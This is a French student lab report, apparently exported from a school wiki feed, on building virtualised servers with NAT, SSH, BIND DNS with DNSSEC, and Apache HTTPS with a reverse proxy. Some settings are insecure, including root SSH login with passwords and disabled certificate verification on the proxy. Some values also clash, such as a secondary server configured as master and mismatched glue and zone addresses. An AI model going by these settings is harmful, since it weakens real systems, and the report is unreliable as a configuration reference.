    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12401</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12401"/>
		<updated>2026-02-25T19:05:06Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Configuration du serveur maître (Moon) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
